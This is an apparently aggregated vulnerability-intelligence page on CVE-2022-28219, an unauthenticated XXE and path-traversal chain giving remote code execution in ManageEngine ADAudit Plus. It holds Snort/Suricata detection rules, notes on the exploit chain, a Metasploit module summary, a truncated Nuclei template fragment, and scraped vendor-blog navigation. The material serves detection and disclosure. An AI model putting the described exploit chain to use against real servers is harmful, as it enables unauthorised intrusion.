CVE-2022-28219
published 2022-04-05CVE-2022-28219: Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
97.01%
99.9th percentile
Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zohocorp | manageengine_adaudit_plus | <= 6.0 | — |
| zohocorp | manageengine_adaudit_plus | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible ManageEngine ADAudit Plus Directory Traversal Leading to Deserialization"; flow:established,to_server; http.uri; content:"/cewolf/"; fast_pattern; content:"?img="; distance:0; pcre:"/^(?:\/?\.\.?\/){2}/R"; content:"|2e 2f|"; reference:url,www.horizon3.ai/red-team-blog-cve-2022-28219/; classtype:attempted-admin; sid:2037216; rev:1; metadata:created_at 2022_06_30, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_06_30, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name File_And_Directory_Discovery; target:dest_ip;)snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible ManageEngine ADAudit Plus XXE (CVE-2022-28219)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/agent/tabs/agentData"; endswith; fast_pattern; http.request_body; content:"|22|Task|20|Content|22|"; content:"<?"; distance:0; content:"<!ENTITY|20|"; distance:0; reference:url,www.horizon3.ai/red-team-blog-cve-2022-28219/; reference:cve,2022-28219; classtype:attempted-admin; sid:2037217; rev:1; metadata:attack_target Server, created_at 2022_06_30, cve CVE_2022_28219, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2022_06_30, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes
|2e 2f|
- →Path traversal exploitation targets the /cewolf endpoint with ?img= parameter using sequences of ../../ (URL-encoded or literal) to traverse directories; match URI pattern /cewolf/ followed by ?img= with at least two ../ sequences. ↗
- →XXE exploitation targets POST requests to /api/agent/tabs/agentData with a JSON body containing 'Task Content' and an embedded XML declaration (<?...) followed by an <!ENTITY declaration — indicative of blind XXE payload injection. ↗
- →The nuclei template confirms exploitation by checking for an out-of-band HTTP interaction (interactsh_protocol: http) combined with 'ManageEngine' in the response body, indicating successful XXE-triggered SSRF/callback. ↗
- →Check Point IPS signature 'Zoho ManageEngine ADAudit Plus Remote Code Execution (CVE-2022-28219)' provides network-level protection against this exploit chain. ↗
- ·The vulnerability affects ManageEngine ADAudit Plus versions before build 7060 only; patched installations (build 7060+) are not vulnerable. ↗
- ·The exploit is a chained attack: the path traversal in /cewolf is combined with a blind XXE in /api/agent/tabs/agentData to achieve unauthenticated RCE — both endpoints must be monitored together for full coverage. ↗
- ·The ET Snort rule for the XXE component (sid:2037217) carries only 'Medium' confidence, meaning it may produce false positives on legitimate agent data submissions to the same endpoint. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cgv8-9r56-pqqh: Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution
ghsa_unreviewed·2022-04-06
CVE-2022-28219 [CRITICAL] CWE-611 GHSA-cgv8-9r56-pqqh: Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution
Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
VulnCheck
Zoho manageengine_adaudit_plus Improper Restriction of XML External Entity Reference
vulncheck·2022·CVSS 9.8
CVE-2022-28219 [CRITICAL] Zoho manageengine_adaudit_plus Improper Restriction of XML External Entity Reference
Zoho manageengine_adaudit_plus Improper Restriction of XML External Entity Reference
Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
Affected: Zoho manageengine_adaudit_plus
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2022-28219; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2022-28219; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-
Suricata
ET EXPLOIT Possible ManageEngine ADAudit Plus Directory Traversal Leading to Deserialization
suricata·2022-06-30
CVE-2022-28219 ET EXPLOIT Possible ManageEngine ADAudit Plus Directory Traversal Leading to Deserialization
ET EXPLOIT Possible ManageEngine ADAudit Plus Directory Traversal Leading to Deserialization
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible ManageEngine ADAudit Plus Directory Traversal Leading to Deserialization"; flow:established,to_server; http.uri; content:"/cewolf/"; fast_pattern; content:"?img="; distance:0; pcre:"/^(?:\/?\.\.?\/){2}/R"; content:"|2e 2f|"; reference:url,www.horizon3.ai/red-team-blog-cve-2022-28219/; classtype:attempted-admin; sid:2037216; rev:1; metadata:created_at 2022_06_30, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_06_30, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name F
Suricata
ET EXPLOIT Possible ManageEngine ADAudit Plus XXE (CVE-2022-28219)
suricata·2022-06-30·CVSS 9.8
CVE-2022-28219 [CRITICAL] ET EXPLOIT Possible ManageEngine ADAudit Plus XXE (CVE-2022-28219)
ET EXPLOIT Possible ManageEngine ADAudit Plus XXE (CVE-2022-28219)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible ManageEngine ADAudit Plus XXE (CVE-2022-28219)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/agent/tabs/agentData"; endswith; fast_pattern; http.request_body; content:"|22|Task|20|Content|22|"; content:"<?"; distance:0; content:"<!ENTITY|20|"; distance:0; reference:url,www.horizon3.ai/red-team-blog-cve-2022-28219/; reference:cve,2022-28219; classtype:attempted-admin; sid:2037217; rev:1; metadata:attack_target Server, created_at 2022_06_30, cve CVE_2022_28219, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2022_06_30, mitre_tactic_id TA0001,
Metasploit
ManageEngine ADAudit Plus CVE-2022-28219
metasploit·CVSS 9.8
CVE-2022-28219 [CRITICAL] ManageEngine ADAudit Plus CVE-2022-28219
ManageEngine ADAudit Plus CVE-2022-28219
This module exploits CVE-2022-28219, which is a pair of vulnerabilities in ManageEngine ADAudit Plus versions before build 7060: a path traversal in the /cewolf endpoint, and a blind XXE in, to upload and execute an executable file.
Nuclei
Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-28219 [CRITICAL] Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution
Zoho ManageEngine ADAudit Plus %xxe; ]>"
}
]
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: body
words:
- "ManageEngine"
# digest: 490a0046304402207f16bc6eabbf4b8d36f635780701d0c9fafb11dfa9709f133af39432e49a4367022074293b48ec128a58ed2ded2b0b6b28471fd99d226732fa423b9916103d43b5b9:922c64590222798bb761d5b6d8e72950
Checkpoint
4th July – Threat Intelligence Report
blogs_checkpoint·2022-07-04
CVE-2021-34473 4th July – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 4th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 4th July, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Iranian steel manufacturing plants have suffered a cyberattack which reportedly forced them to halt production. The hacker group Gonjeshke Darande, which has previously attacked the Iranian railway system, assumed responsibility for the attack. Check Point Research found and analyzed a malware sample used as part of this attack,
Tenable
Cybersecurity Snapshot: 6 Things That Matter Right Now
blogs_tenable·2022-07-01
Cybersecurity Snapshot: 6 Things That Matter Right Now
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2022-28219: Proof-of-Concept Published for Unauthenticated RCE in Zoho ManageEngine ADAudit Plus
blogs_tenable·2022-06-30·CVSS 9.8
[CRITICAL] CVE-2022-28219: Proof-of-Concept Published for Unauthenticated RCE in Zoho ManageEngine ADAudit Plus
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://cewolf.sourceforge.net/new/index.htmlhttp://packetstormsecurity.com/files/167997/ManageEngine-ADAudit-Plus-Path-Traversal-XML-Injection.htmlhttps://manageengine.comhttps://www.horizon3.ai/red-team-blog-cve-2022-28219/https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.htmlhttp://cewolf.sourceforge.net/new/index.htmlhttp://packetstormsecurity.com/files/167997/ManageEngine-ADAudit-Plus-Path-Traversal-XML-Injection.htmlhttps://manageengine.comhttps://www.horizon3.ai/red-team-blog-cve-2022-28219/https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
2022-04-05
Published
Exploited in the wild